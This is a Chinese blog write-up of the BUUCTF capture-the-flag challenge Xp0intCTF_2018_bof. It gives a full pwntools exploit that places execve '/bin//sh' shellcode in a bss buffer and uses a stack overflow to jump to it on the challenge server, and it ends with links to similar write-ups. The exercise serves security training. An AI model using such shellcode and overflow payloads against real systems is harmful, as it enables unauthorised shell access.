BUUCTF pwn Xp0intCTF_2018_bof

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量8.7k 收藏
点赞数
分类专栏: pwn安全 文章标签: python 安全 信息安全 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/stareforever/article/details/112495529
版权

查看程序保护
在这里插入图片描述
保护基本都没开

IDA打开查看程序流程
在这里插入图片描述
读入0x18个字符,NAME位置在bss段
在这里插入图片描述
然后程序进入到fun1函数,有明显的栈溢出漏洞,溢出长度为0x10,正好可以控制返回地址
在这里插入图片描述
主要思想:基本保护都没开,那么可以先在NAME处读入shellcode。后面进入到fun1函数里,利用栈溢出控制程序返回到NAME处

这里shellcode长度最多为0x18
那么可以用

shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

完整ex

from pwn import *
context(log_level='debug',arch='amd64')

#io=process("./Xp0intCTF_2018_bof")
io=remote("node3.buuoj.cn",25451)

io.recv()

shellcode=b"\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
io.send(shellcode)

io.recv()

name_bss=0x404070

payload=b'A'*0x20+b'B'*0x8+p64(name_bss)

io.send(payload)

io.interactive()
stareforever
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 940
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 446
buuctf-pwn 001-016题wp
BUUCTF pwn xp0intctf_2018_tutorial1
热门推荐
stareforever的博客
01-08 1万+
查看保护 用IDA打开查看程序流程 有后门函数backdoor,可以直接获得shell 程序逻辑很简单,输入buf使得buf==0xBABABABA即可获得shell 那么直接可以构造payload 完整ex from pwn import * context(log_level='debug') #io=process("./Xp0intCTF_2018_tutorial1") io=remote("node3.buuoj.cn",25721) io.recv() buf=0xBABABA
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 526
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 298
buuctf-pwn 017-026题wp,重点关注babyheap
[BUUCTF]PWN-wdb_2018_3rd_soEasy
红凳子的博客
05-07 459
[BUUCTF]PWN-wdb_2018_3rd_soEasy前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 二、使用步骤 1.引入库 代码如下(示例): import numpy as np import pandas as pd impo
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 357
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF - PWN】ciscn_2019_c_1
古月浪子的博客
03-20 4104
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1011
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3136
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
ctf-writeups:BOF七叶树局的报道
03-16
CTF撰写 比赛历史 日期 姓名 秩 21/05/21-21/07/21 40/1059 03/12/21-03/14/21 (德克萨斯大学) 7/697
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3237
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 284
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 253
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1160
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 249
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 568
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2040
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 687
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值